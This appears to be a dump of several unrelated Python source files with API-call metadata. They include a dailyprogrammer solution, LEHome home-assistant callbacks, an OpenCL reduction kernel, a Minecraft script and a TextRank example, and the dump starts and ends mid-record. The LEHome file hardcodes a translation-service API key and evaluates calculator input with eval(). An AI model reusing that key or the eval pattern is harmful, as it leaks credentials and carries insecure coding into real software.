1133), 'pandas.util.testing.assert_frame_equal', 'tm.assert_frame_equal', (['df', 'loaded_df'], {'check_names': '(False)'}), '(df, loaded_df, check_names=False)\n', (1099, 1133), True, 'import pandas.util.testing as tm\n'), ((1183, 1191), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (1189, 1191), False, 'from pandas.core.series import Series\n'), ((1417, 1456), 'pandas.read_excel', 'read_excel', (['excel_name'], {'sheet_name': 'None'}), '(excel_name, sheet_name=None)\n', (1427, 1456), False, 'from pandas import read_excel\n'), ((1560, 1571), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (1569, 1571), False, 'from pandas.core.frame import DataFrame\n'), ((1586, 1597), 'pandas.core.frame.DataFrame', 'DataFrame', ([], {}), '()\n', (1595, 1597), False, 'from pandas.core.frame import 
DataFrame\n'), ((1616, 1624), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (1622, 1624), False, 'from pandas.core.series import Series\n'), ((1643, 1651), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (1649, 1651), False, 'from pandas.core.series import Series\n'), ((2440, 2448), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (2446, 2448), False, 'from pandas.core.series import Series\n'), ((2600, 2639), 'pandas.read_excel', 'read_excel', (['excel_name'], {'sheet_name': 'None'}), '(excel_name, sheet_name=None)\n', (2610, 2639), False, 'from pandas import read_excel\n'), ((5805, 5829), 'pytest.raises', 'pytest.raises', (['NameError'], {}), '(NameError)\n', (5818, 5829), False, 'import pytest\n'), ((5943, 5967), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (5956, 5967), False, 'import pytest\n'), ((6047, 6071), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (6060, 6071), False, 'import pytest\n'), ((6155, 6182), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {}), '(RuntimeError)\n', (6168, 6182), False, 'import pytest\n'), ((6387, 6414), 'pytest.raises', 'pytest.raises', (['RuntimeError'], {}), '(RuntimeError)\n', (6400, 6414), False, 'import pytest\n'), ((2793, 2849), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['date_string', '"""%Y%m%d-%H%M%S"""'], {}), "(date_string, '%Y%m%d-%H%M%S')\n", (2819, 2849), False, 'import datetime\n'), ((3065, 3101), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (3088, 3101), False, 'import warnings\n'), ((3120, 3151), 'warnings.simplefilter', 'warnings.simplefilter', (['"""always"""'], {}), "('always')\n", (3141, 3151), False, 'import warnings\n'), ((3532, 3568), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (3555, 3568), False, 'import warnings\n'), ((3596, 3604), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (3602, 3604), False, 'from pandas.core.series import Series\n'), ((4005, 4041), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {'record': '(True)'}), '(record=True)\n', (4028, 4041), False, 'import warnings\n'), ((4060, 4091), 'warnings.simplefilter', 'warnings.simplefilter', (['"""always"""'], {}), "('always')\n", (4081, 4091), False, 'import warnings\n'), ((2031, 2101), 'pandas.read_excel', 'read_excel', (['excel_name'], {'sheet_name': 'name', 'squeeze': '(True)', 'dtype': 'obj.dtype'}), '(excel_name, sheet_name=name, squeeze=True, dtype=obj.dtype)\n', (2041, 2101), False, 'from pandas import read_excel\n'), ((2118, 2177), 'pandas.util.testing.assert_series_equal', 'tm.assert_series_equal', (['obj', 'loaded_data'], {'check_names': '(False)'}), '(obj, loaded_data, check_names=False)\n', (2140, 2177), True, 'import pandas.util.testing as tm\n'), ((2877, 2900), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2898, 2900), False, 'import datetime\n'), ((6367, 6375), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (6373, 6375), False, 'from pandas.core.series import Series\n'), ((2253, 2310), 'pandas.read_excel', 'read_excel', (['excel_name'], {'sheet_name': 'name', 'dtype': 'obj.dtypes'}), '(excel_name, sheet_name=name, dtype=obj.dtypes)\n', (2263, 2310), False, 'from pandas import read_excel\n'), ((2327, 2385), 'pandas.util.testing.assert_frame_equal', 'tm.assert_frame_equal', (['obj', 'loaded_data'], {'check_names': '(False)'}), '(obj, loaded_data, check_names=False)\n', (2348, 2385), 
True, 'import pandas.util.testing as tm\n'), ((3192, 3200), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (3198, 3200), False, 'from pandas.core.series import Series\n'), ((4166, 4174), 'pandas.core.series.Series', 'Series', ([], {}), '()\n', (4172, 4174), False, 'from pandas.core.series import Series\n'), ((4646, 4660), 'pathlib.Path', 'pathlib.Path', ([], {}), '()\n', (4658, 4660), False, 'import pathlib\n'), ((4872, 4886), 'pathlib.Path', 'pathlib.Path', ([], {}), '()\n', (4884, 4886), False, 'import pathlib\n')] |
lw7360/dailyprogrammer | Easy/233/233.py | 7a0a4bdf20dd22ca96713958b479d963a15b09f5 | # https://www.reddit.com/r/dailyprogrammer/comments/3ltee2/20150921_challenge_233_easy_the_house_that_ascii/
import random
import sys
def main():
data = open(sys.argv[1]).read().splitlines()[1::]
door = random.randrange(len(data[-1]))
wideData = []
for row in data:
curStr = ''
for ast in row:
if ast == '*':
curStr += '*****'
else:
curStr += ' '
wideData.append(curStr)
longData = []
for row in wideData:
longData.append(row[:])
longData.append(row[:])
longData.append(row[:])
for row in longData:
print row
if __name__ == "__main__":
main()
| [] |
uwitec/LEHome | usr/callbacks/action/tools.py | a959a2fe64a23c58de7c0ff3254eae8c27732320 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import division
from decimal import Decimal
import subprocess
import threading
import urllib2
import urllib
import httplib
import json
import re
import hashlib
import base64
# import zlib
from lib.command.runtime import UserInput
from lib.helper.CameraHelper import CameraHelper
from lib.sound import Sound
from util import Util
from util.Res import Res
from util.log import *
from lib.model import Callback
class timer_callback(Callback.Callback):
def callback(self, cmd, action, target, msg):
if msg is None:
self._home.publish_msg(cmd, u"时间格式错误")
return False, None
if msg.endswith(u'点') or \
msg.endswith(u'分'):
t = Util.gap_for_timestring(msg)
elif msg.endswith(u"秒"):
t = int(Util.cn2dig(msg[:-1]))
elif msg.endswith(u"分钟"):
t = int(Util.cn2dig(msg[:-2]))*60
elif msg.endswith(u"小时"):
t = int(Util.cn2dig(msg[:-2]))*60*60
else:
self._home.publish_msg(cmd, u"时间格式错误")
return False
if t is None:
self._home.publish_msg(cmd, u"时间格式错误")
return False, None
DEBUG("thread wait for %d sec" % (t, ))
self._home.publish_msg(cmd, action + target + msg)
threading.current_thread().waitUtil(t)
if threading.current_thread().stopped():
return False
self._home.setResume(True)
count = 7
Sound.notice( Res.get_res_path("sound/com_bell"), True, count)
self._home.setResume(False)
return True
class translate_callback(Callback.Callback):
base_url = "http://fanyi.youdao.com/openapi.do"
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if msg is None:
self._home.publish_msg(cmd, u"无翻译内容")
elif len(msg) > 200:
self._home.publish_msg(cmd, u"翻译内容过长(<200字)")
else:
try:
values = {
"keyfrom":"11111testt111",
"key":"2125866912",
"type":"data",
"doctype":"json",
"version":"1.1",
"q":msg.encode("utf-8")
}
url = translate_callback.base_url + "?" + urllib.urlencode(values)
res = urllib2.urlopen(url).read()
res = " ".join(json.loads(res)["translation"])
self._home.publish_msg(cmd, u"翻译结果:\n" + res)
except Exception, ex:
ERROR("request error:", ex)
self._home.publish_msg(cmd, u"翻译失败")
return True
return True
class baidu_wiki_callback(Callback.Callback):
base_url = "http://wapbaike.baidu.com"
def searchWiki(self, word, time=10):
value = {"word": word.encode("utf-8")}
url = baidu_wiki_callback.base_url + \
"/search?" + urllib.urlencode(value)
try:
response = urllib2.urlopen(url, timeout=time)
html = response.read().encode("utf-8")
response.close()
real_url = None
content = None
m = re.compile(r"URL=(.+)'>").search(html)
if m:
real_url = m.group(1)
else:
return None, None
real_url = real_url[:real_url.index("?")]
if not real_url is None:
url = baidu_wiki_callback.base_url + real_url
response = urllib2.urlopen(url, timeout=time)
html = response.read()
response.close()
m = re.compile(
r'<p class="summary"><p>(.+)<div class="card-info">',
re.DOTALL
).search(html)
if m:
content = m.group(1)
return Util.strip_tags(content), url
else:
return None, None
except Exception, ex:
ERROR("wiki error: ", ex)
return None, None
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if not msg is None:
self._home.publish_msg(cmd, u"正在搜索...")
res, url = self.searchWiki(msg)
if res is None:
self._home.publish_msg(cmd, u"无百科内容")
else:
res = res.decode("utf-8")
if len(res) > 140:
res = res[:140]
msg = u"百度百科:\n %s...\n%s" \
% (res, url)
self._home.publish_msg(cmd, msg)
else:
self._home.publish_msg(cmd, u"无百科内容")
return True
class cal_callback(Callback.Callback):
_ops = {
u'加':'+',
u'减':'-',
u'乘':'*',
u'除':'/',
u'+':'+',
u'-':'-',
u'*':'*',
u'/':'/',
u'(':'(',
u'(':'(',
u')':')',
u')':')',
}
def _parse_tokens(self, src):
tokens = []
cur_t = u''
for term in src:
if term in cal_callback._ops:
if cur_t != u'':
tokens.append(cur_t)
cur_t = u''
tokens.append(term)
else:
cur_t += term
if cur_t != u'':
tokens.append(cur_t)
return tokens
def _parse_expression(self, tokens):
expression = u''
for token in tokens:
if token in cal_callback._ops:
expression += cal_callback._ops[token]
else:
num = Util.cn2dig(token)
if num is None:
return None
expression += str(num)
res = None
INFO("expression: " + expression)
try:
res = eval(expression)
res = Decimal.from_float(res).quantize(Decimal('0.00'))
except Exception, ex:
ERROR("cal expression error:", ex)
return res
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入公式, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if msg is None:
self._home.publish_msg(cmd, u"无公式内容")
else:
tokens = self._parse_tokens(msg)
if not tokens is None:
res = self._parse_expression(tokens)
if not res is None:
self._home.publish_msg(cmd, u"%s = %s" % (msg, str(res)))
return True, res
else:
self._home.publish_msg(cmd, u"计算出错")
return True, None
else:
self._home.publish_msg(cmd, u"格式有误")
return True, None
class camera_quickshot_callback(Callback.Callback):
IMAGE_SERVER_URL = "http://lehome.sinaapp.com/image"
IMAGE_HOST_URL = "http://lehome-image.stor.sinaapp.com/"
def _upload_image(self, img_src, thumbnail_src):
if img_src is None or len(img_src) == 0:
return None, None
INFO("uploading: %s %s" % (img_src, thumbnail_src))
# swift --insecure upload image data/capture/2015_05_23_001856.jpg
proc = subprocess.Popen(
[
"swift",
"--insecure",
"upload",
"image",
thumbnail_src,
img_src
],
stdout=subprocess.PIPE
)
read_img = None
read_thumbnail = None
for i in range(2) :
try:
data = proc.stdout.readline().strip() #block / wait
INFO("swift readline: %s" % data)
if data.endswith(".thumbnail.jpg"):
INFO("save to storage:%s" % data)
read_thumbnail = camera_quickshot_callback.IMAGE_HOST_URL + data
elif data.endswith(".jpg"):
INFO("save to storage:%s" % data)
read_img = camera_quickshot_callback.IMAGE_HOST_URL + data
if not read_img is None and not read_thumbnail is None:
return read_img, read_thumbnail
except (KeyboardInterrupt, SystemExit):
raise
except Exception, ex:
ERROR(ex)
break
return None, None
def callback(self, cmd, msg):
self._home.publish_msg(cmd, u"正在截图...")
Sound.notice(Res.get_res_path("sound/com_shoot"))
save_path="data/capture/"
save_name, thumbnail_name = CameraHelper().take_a_photo(save_path)
# for test
# save_name = "2015_05_02_164052.jpg"
if save_name is None:
self._home.publish_msg(cmd, u"截图失败")
INFO("capture faild.")
return True
img_url, thumbnail_url = self._upload_image(
save_path + save_name,
save_path + thumbnail_name,
)
if img_url is None:
self._home.publish_msg(cmd, u"截图失败")
INFO("upload capture faild.")
return True
else:
self._home.publish_msg(
cmd,
msg=img_url,
cmd_type="capture"
)
return True
class push_info_callback(Callback.Callback):
def callback(self, cmd, target, msg):
if target is None or len(target) == 0:
if msg is None or len(msg) == 0:
self._home.publish_msg(cmd, u"请输入内容")
return True, None
self._home.publish_msg(cmd, msg)
DEBUG("show_callback: %s" % msg)
return True, msg
return True, "push"
| [] |
Athenian-Computer-Science/numeric-operations-1-practice-template | src/fix_code_1.py | cdfe370ced98c5e4c770bb89bb7faf0da31ea985 | #############################
# Collaborators: (enter people or resources who/that helped you)
# If none, write none
#
#
#############################
base = float(input("Enter the base: "))
height = float(input("Enter the height: "))
area = (base * height) / 2  # Calculate the area of the triangle
print(f"The area of the triangle is {area}.") | []
gmazzamuto/gputools | gputools/core/oclmultireduction.py | 73a4dee76a119f94d8163781a85b691fd080d506 | """
an adaptation of pyopencl's reduction kernel for weighted averages
like sum(a*b)
[email protected]
"""
from __future__ import print_function, unicode_literals, absolute_import, division
from six.moves import zip
import pyopencl as cl
from pyopencl.tools import (
context_dependent_memoize,
dtype_to_ctype, KernelTemplateBase,
_process_code_for_macro)
import numpy as np
from gputools import get_device
import sys
# {{{ kernel source
KERNEL = r"""//CL//
<%
inds = range(len(map_exprs))
%>
#define GROUP_SIZE ${group_size}
% for i,m in enumerate(map_exprs):
#define READ_AND_MAP_${i}(i) (${m})
% endfor
#define REDUCE(a, b) (${reduce_expr})
% if double_support:
#if __OPENCL_C_VERSION__ < 120
#pragma OPENCL EXTENSION cl_khr_fp64: enable
#endif
#define PYOPENCL_DEFINE_CDOUBLE
% endif
#include <pyopencl-complex.h>
${preamble}
typedef ${out_type} out_type;
__kernel void ${name}(
% for i in inds:
__global out_type *out__base_${i},
% endfor
long out__offset, ${arguments},
unsigned int seq_count, unsigned int n)
{
% for i in inds:
__global out_type *out_${i} = (__global out_type *) (
(__global char *) out__base_${i} + out__offset);
% endfor
${arg_prep}
% for i in inds:
__local out_type ldata_${i}[GROUP_SIZE];
out_type acc_${i} = ${neutral};
% endfor
unsigned int lid = get_local_id(0);
unsigned int i = get_group_id(0)*GROUP_SIZE*seq_count + lid;
//printf("seq: %d\tlid = %d\ti=%d\n",seq_count,lid,i);
for (unsigned s = 0; s < seq_count; ++s)
{
if (i >= n)
break;
% for i in inds:
acc_${i} = REDUCE(acc_${i}, READ_AND_MAP_${i}(i));
% endfor
i += GROUP_SIZE;
}
% for i in inds:
ldata_${i}[lid] = acc_${i};
% endfor
<%
cur_size = group_size
%>
% while cur_size > 1:
barrier(CLK_LOCAL_MEM_FENCE);
<%
new_size = cur_size // 2
assert new_size * 2 == cur_size
%>
if (lid < ${new_size})
{
% for i in inds:
ldata_${i}[lid] = REDUCE(
ldata_${i}[lid],
ldata_${i}[lid + ${new_size}]);
% endfor
}
<% cur_size = new_size %>
% endwhile
if (lid == 0) {
% for i in inds:
out_${i}[get_group_id(0)] = ldata_${i}[0];
% endfor
//printf("result: %.4f\n",out_0[get_group_id(0)] );
}
}
"""
def _get_reduction_source(
ctx, out_type, out_type_size,
neutral, reduce_expr, map_exprs, parsed_args,
name="reduce_kernel", preamble="", arg_prep="",
device=None, max_group_size=None):
if device is not None:
devices = [device]
else:
devices = ctx.devices
# {{{ compute group size
def get_dev_group_size(device):
# dirty fix for the RV770 boards
max_work_group_size = device.max_work_group_size
if "RV770" in device.name:
max_work_group_size = 64
# compute lmem limit
from pytools import div_ceil
lmem_wg_size = div_ceil(max_work_group_size, out_type_size)
result = min(max_work_group_size, lmem_wg_size)
# round down to power of 2
from pyopencl.tools import bitlog2
return 2**bitlog2(result)
group_size = min(get_dev_group_size(dev) for dev in devices)
if max_group_size is not None:
group_size = min(max_group_size, group_size)
# }}}
from mako.template import Template
from pytools import all
from pyopencl.characterize import has_double_support
src = str(Template(KERNEL).render(
out_type=out_type,
arguments=", ".join(arg.declarator() for arg in parsed_args),
group_size=group_size,
neutral=neutral,
reduce_expr=_process_code_for_macro(reduce_expr),
map_exprs=[_process_code_for_macro(m) for m in map_exprs],
name=name,
preamble=preamble,
arg_prep=arg_prep,
double_support=all(has_double_support(dev) for dev in devices),
))
# sys.exit()
from pytools import Record
class ReductionInfo(Record):
pass
return ReductionInfo(
context=ctx,
source=src,
group_size=group_size)
def get_reduction_kernel(stage,
ctx, dtype_out,
neutral, reduce_expr, arguments=None,
name="reduce_kernel", preamble="",
map_exprs = None,
device=None, options=[], max_group_size=None):
if map_exprs is None:
raise ValueError("map_exprs has to be given!")
for i, m in enumerate(map_exprs):
if m is None:
if stage==2:
map_exprs[i] = "pyopencl_reduction_inp_%i[i]"%i
else:
map_exprs[i] = "in[i]"
from pyopencl.tools import (
parse_arg_list, get_arg_list_scalar_arg_dtypes,
get_arg_offset_adjuster_code, VectorArg)
arg_prep = ""
if stage==1 and arguments is not None:
arguments = parse_arg_list(arguments, with_offset=True)
arg_prep = get_arg_offset_adjuster_code(arguments)
if stage==2 and arguments is not None:
arguments = parse_arg_list(arguments)
arguments = (
[VectorArg(dtype_out, "pyopencl_reduction_inp_%i"%i) for i in range(len(map_exprs))]
+arguments)
inf = _get_reduction_source(
ctx, dtype_to_ctype(dtype_out), dtype_out.itemsize,
neutral, reduce_expr, map_exprs, arguments,
name, preamble, arg_prep, device, max_group_size)
inf.program = cl.Program(ctx, inf.source)
inf.program.build(options)
inf.kernel = getattr(inf.program, name)
inf.arg_types = arguments
inf.kernel.set_scalar_arg_dtypes(
[None, ]*len(map_exprs)+[np.int64]
+get_arg_list_scalar_arg_dtypes(inf.arg_types)
+[np.uint32]*2)
return inf
# }}}
# {{{ main reduction kernel
class OCLMultiReductionKernel:
"""
    simultaneous reduction of a weighted sum of several buffers
example:
        k = OCLMultiReductionKernel(np.float32,
neutral="0",reduce_expr="a+b",
map_exprs = ["x[i]", "x[i]*y[i]"],
arguments="__global float *x,__global float *y")
        k(a, b, outs=[out1, out2])
"""
def __init__(self, dtype_out,
neutral, reduce_expr, arguments=None,
map_exprs=[None],
name="reduce_kernel", options=[], preamble=""):
ctx = get_device().context
dtype_out = self.dtype_out = np.dtype(dtype_out)
max_group_size = None
trip_count = 0
self.n_exprs = len(map_exprs)
assert self.n_exprs>0
while True:
self.stage_1_inf = get_reduction_kernel(1, ctx,
dtype_out,
neutral, reduce_expr, arguments,
name=name+"_stage1", options=options, preamble=preamble,
map_exprs=map_exprs,
max_group_size=max_group_size)
kernel_max_wg_size = self.stage_1_inf.kernel.get_work_group_info(
cl.kernel_work_group_info.WORK_GROUP_SIZE,
ctx.devices[0])
if self.stage_1_inf.group_size<=kernel_max_wg_size:
break
else:
max_group_size = kernel_max_wg_size
trip_count += 1
assert trip_count<=2
self.stage_2_inf = get_reduction_kernel(2, ctx,
dtype_out,
neutral, reduce_expr, arguments=arguments,
name=name+"_stage2", options=options,
map_exprs = [None]*self.n_exprs,
preamble=preamble,
max_group_size=max_group_size)
from pytools import any
from pyopencl.tools import VectorArg
assert any(
isinstance(arg_tp, VectorArg)
for arg_tp in self.stage_1_inf.arg_types), \
"ReductionKernel can only be used with functions " \
"that have at least one vector argument"
def __call__(self, *args, **kwargs):
MAX_GROUP_COUNT = 1024 # noqa
SMALL_SEQ_COUNT = 4 # noqa
from pyopencl.array import empty
stage_inf = self.stage_1_inf
queue = kwargs.pop("queue", None)
wait_for = kwargs.pop("wait_for", None)
return_event = kwargs.pop("return_event", False)
outs = kwargs.pop("outs", [None]*self.n_exprs)
if kwargs:
raise TypeError("invalid keyword argument to reduction kernel")
stage1_args = args
while True:
invocation_args = []
vectors = []
from pyopencl.tools import VectorArg
for arg, arg_tp in zip(args, stage_inf.arg_types):
if isinstance(arg_tp, VectorArg):
if not arg.flags.forc:
raise RuntimeError("ReductionKernel cannot "
"deal with non-contiguous arrays")
vectors.append(arg)
invocation_args.append(arg.base_data)
if arg_tp.with_offset:
invocation_args.append(arg.offset)
else:
invocation_args.append(arg)
repr_vec = vectors[0]
sz = repr_vec.size
if queue is not None:
use_queue = queue
else:
use_queue = repr_vec.queue
if sz<=stage_inf.group_size*SMALL_SEQ_COUNT*MAX_GROUP_COUNT:
total_group_size = SMALL_SEQ_COUNT*stage_inf.group_size
group_count = (sz+total_group_size-1)//total_group_size
seq_count = SMALL_SEQ_COUNT
else:
group_count = MAX_GROUP_COUNT
macrogroup_size = group_count*stage_inf.group_size
seq_count = (sz+macrogroup_size-1)//macrogroup_size
if group_count==1:
results = [empty(use_queue,
(), self.dtype_out,
allocator=repr_vec.allocator) if out is None else out for out in outs]
else:
results = [empty(use_queue,
(group_count,), self.dtype_out,
allocator=repr_vec.allocator) for out in outs]
last_evt = stage_inf.kernel(
use_queue,
(group_count*stage_inf.group_size,),
(stage_inf.group_size,),
*([r.base_data for r in results]+[results[0].offset,]
+invocation_args+[seq_count, sz]),
**dict(wait_for=wait_for))
wait_for = [last_evt]
#print "ooooo ", group_count, len(args)
if group_count==1:
if return_event:
return results, last_evt
else:
return results
else:
stage_inf = self.stage_2_inf
args = tuple(results)+stage1_args
#args = (results[0],)+stage1_args
if __name__=='__main__':
from gputools import OCLArray, OCLReductionKernel
k1 = OCLReductionKernel(np.float32,
neutral="0", reduce_expr="a+b",
map_expr="x[i]",
arguments="__global float *x")
k2 = OCLMultiReductionKernel(np.float32,
neutral="0", reduce_expr="a+b",
map_exprs=["y[i]*x[i]","x[i]"],
arguments="__global float *x, __global float *y")
N = 512
a = OCLArray.from_array(np.ones((N,N),np.float32))
b = OCLArray.from_array(2.*np.ones((N,N),np.float32))
o1 = OCLArray.empty((),np.float32)
o2 = OCLArray.empty((),np.float32)
from time import time
t = time()
for _ in range(400):
k1(a)
k1(b)
k1(a).get()
k1(b).get()
print(time()-t)
t = time()
#print k2(a,b, outs = [o1,o2])
for _ in range(400):
k2(a[0],b[0], outs = [o1,o2])
o1.get()
print(time()-t)
# open("kern_new_1.txt","w").write(("%s"%k2.stage_1_inf).replace("\\n","\n"))
# open("kern_new_2.txt","w").write(("%s"%k2.stage_2_inf).replace("\\n","\n"))
| [((5967, 5994), 'pyopencl.Program', 'cl.Program', (['ctx', 'inf.source'], {}), '(ctx, inf.source)\n', (5977, 5994), True, 'import pyopencl as cl\n'), ((11888, 12003), 'gputools.OCLReductionKernel', 'OCLReductionKernel', (['np.float32'], {'neutral': '"""0"""', 'reduce_expr': '"""a+b"""', 'map_expr': '"""x[i]"""', 'arguments': '"""__global float *x"""'}), "(np.float32, neutral='0', reduce_expr='a+b', map_expr=\n 'x[i]', arguments='__global float *x')\n", (11906, 12003), False, 'from gputools import OCLArray, OCLReductionKernel\n'), ((12482, 12512), 'gputools.OCLArray.empty', 'OCLArray.empty', (['()', 'np.float32'], {}), '((), np.float32)\n', (12496, 12512), False, 'from gputools import OCLArray, OCLReductionKernel\n'), ((12521, 12551), 'gputools.OCLArray.empty', 'OCLArray.empty', (['()', 'np.float32'], {}), '((), np.float32)\n', (12535, 12551), False, 'from gputools import OCLArray, OCLReductionKernel\n'), ((12587, 12593), 'time.time', 'time', ([], {}), '()\n', (12591, 12593), False, 'from time import time\n'), ((12710, 12716), 'time.time', 'time', ([], {}), '()\n', (12714, 12716), False, 'from time import time\n'), ((3405, 3449), 'pytools.div_ceil', 'div_ceil', (['max_work_group_size', 'out_type_size'], {}), '(max_work_group_size, out_type_size)\n', (3413, 3449), False, 'from pytools import div_ceil\n'), ((5407, 5450), 'pyopencl.tools.parse_arg_list', 'parse_arg_list', (['arguments'], {'with_offset': '(True)'}), '(arguments, with_offset=True)\n', (5421, 5450), False, 'from pyopencl.tools import parse_arg_list, get_arg_list_scalar_arg_dtypes, get_arg_offset_adjuster_code, VectorArg\n'), ((5470, 5509), 'pyopencl.tools.get_arg_offset_adjuster_code', 'get_arg_offset_adjuster_code', (['arguments'], {}), '(arguments)\n', (5498, 5509), False, 'from pyopencl.tools import parse_arg_list, get_arg_list_scalar_arg_dtypes, get_arg_offset_adjuster_code, VectorArg\n'), ((5574, 5599), 'pyopencl.tools.parse_arg_list', 'parse_arg_list', (['arguments'], {}), '(arguments)\n', (5588, 5599), False, 'from pyopencl.tools import parse_arg_list, get_arg_list_scalar_arg_dtypes, get_arg_offset_adjuster_code, VectorArg\n'), ((5791, 5816), 'pyopencl.tools.dtype_to_ctype', 'dtype_to_ctype', (['dtype_out'], {}), '(dtype_out)\n', (5805, 5816), False, 'from pyopencl.tools import context_dependent_memoize, dtype_to_ctype, KernelTemplateBase, _process_code_for_macro\n'), ((6953, 6972), 'numpy.dtype', 'np.dtype', (['dtype_out'], {}), '(dtype_out)\n', (6961, 6972), True, 'import numpy as np\n'), ((12386, 12413), 'numpy.ones', 'np.ones', (['(N, N)', 'np.float32'], {}), '((N, N), np.float32)\n', (12393, 12413), True, 'import numpy as np\n'), ((3603, 3618), 'pyopencl.tools.bitlog2', 'bitlog2', (['result'], {}), '(result)\n', (3610, 3618), False, 'from pyopencl.tools import bitlog2\n'), ((6895, 6907), 'gputools.get_device', 'get_device', ([], {}), '()\n', (6905, 6907), False, 'from gputools import get_device\n'), ((9407, 9437), 'six.moves.zip', 'zip', (['args', 'stage_inf.arg_types'], {}), '(args, stage_inf.arg_types)\n', (9410, 9437), False, 'from six.moves import zip\n'), ((12444, 12471), 'numpy.ones', 'np.ones', (['(N, N)', 'np.float32'], {}), '((N, N), np.float32)\n', (12451, 12471), True, 'import numpy as np\n'), ((12690, 12696), 'time.time', 'time', ([], {}), '()\n', (12694, 12696), False, 'from time import time\n'), ((12839, 12845), 'time.time', 'time', ([], {}), '()\n', (12843, 12845), False, 'from time import time\n'), ((3927, 3943), 'mako.template.Template', 'Template', (['KERNEL'], {}), '(KERNEL)\n', (3935, 3943), 
False, 'from mako.template import Template\n'), ((4125, 4161), 'pyopencl.tools._process_code_for_macro', '_process_code_for_macro', (['reduce_expr'], {}), '(reduce_expr)\n', (4148, 4161), False, 'from pyopencl.tools import context_dependent_memoize, dtype_to_ctype, KernelTemplateBase, _process_code_for_macro\n'), ((5635, 5688), 'pyopencl.tools.VectorArg', 'VectorArg', (['dtype_out', "('pyopencl_reduction_inp_%i' % i)"], {}), "(dtype_out, 'pyopencl_reduction_inp_%i' % i)\n", (5644, 5688), False, 'from pyopencl.tools import VectorArg\n'), ((6192, 6237), 'pyopencl.tools.get_arg_list_scalar_arg_dtypes', 'get_arg_list_scalar_arg_dtypes', (['inf.arg_types'], {}), '(inf.arg_types)\n', (6222, 6237), False, 'from pyopencl.tools import parse_arg_list, get_arg_list_scalar_arg_dtypes, get_arg_offset_adjuster_code, VectorArg\n'), ((4182, 4208), 'pyopencl.tools._process_code_for_macro', '_process_code_for_macro', (['m'], {}), '(m)\n', (4205, 4208), False, 'from pyopencl.tools import context_dependent_memoize, dtype_to_ctype, KernelTemplateBase, _process_code_for_macro\n'), ((10886, 10964), 'pyopencl.array.empty', 'empty', (['use_queue', '(group_count,)', 'self.dtype_out'], {'allocator': 'repr_vec.allocator'}), '(use_queue, (group_count,), self.dtype_out, allocator=repr_vec.allocator)\n', (10891, 10964), False, 'from pyopencl.array import empty\n'), ((4330, 4353), 'pyopencl.characterize.has_double_support', 'has_double_support', (['dev'], {}), '(dev)\n', (4348, 4353), False, 'from pyopencl.characterize import has_double_support\n'), ((10667, 10733), 'pyopencl.array.empty', 'empty', (['use_queue', '()', 'self.dtype_out'], {'allocator': 'repr_vec.allocator'}), '(use_queue, (), self.dtype_out, allocator=repr_vec.allocator)\n', (10672, 10733), False, 'from pyopencl.array import empty\n')] |
DidymusRex/PiCraft | mineshaft.py | 07b7dad2e68a2473e4314c9b77cb82abce41ae97 | #! /usr/bin/env python
import mcpi.minecraft as minecraft
import mcpi.block as block
import random
import time
mc = minecraft.Minecraft.create()
# ----------------------------------------------------------------------
# S E T U P
# ----------------------------------------------------------------------
# Where Am I?
pos = mc.player.getTilePos()
print "Game center point is %d, %d, %d" % (pos.x, pos.y, pos.z)
limit=256
# Carve an 11 x 11 shaft of air from the player's position straight down 256 blocks
mc.setBlocks(pos.x, pos.y, pos.z, pos.x+10, pos.y-256, pos.z+10, block.AIR.id)
# Raise an 11 x 11 column of diamond ore 256 blocks upward on the opposite (negative x/z) side
mc.setBlocks(pos.x, pos.y, pos.z, pos.x-10, pos.y+256, pos.z-10, block.DIAMOND_ORE.id)
| [] |
ChenglongChen/TextRank4ZH | example/example01.py | 5af7b9d33d9e686411576362dfccf6f9d3d3282b | #-*- encoding:utf-8 -*-
from __future__ import print_function
import sys
try:
reload(sys)
sys.setdefaultencoding('utf-8')
except:
pass
import codecs
from textrank4zh import TextRank4Keyword, TextRank4Sentence
text = codecs.open('../test/doc/01.txt', 'r', 'utf-8').read()
tr4w = TextRank4Keyword()
tr4w.analyze(text=text, lower=True, window=2)   # In py2, text must be a utf8-encoded str or a unicode object; in py3, it must be utf8-encoded bytes or a str object
print( '关键词:' )
for item in tr4w.get_keywords(20, word_min_len=1):
print(item.word, item.weight)
print()
print( '关键短语:' )
for phrase in tr4w.get_keyphrases(keywords_num=20, min_occur_num= 2):
print(phrase)
tr4s = TextRank4Sentence()
tr4s.analyze(text=text, lower=True, source = 'all_filters')
print()
print( '摘要:' )
for item in tr4s.get_key_sentences(num=3):
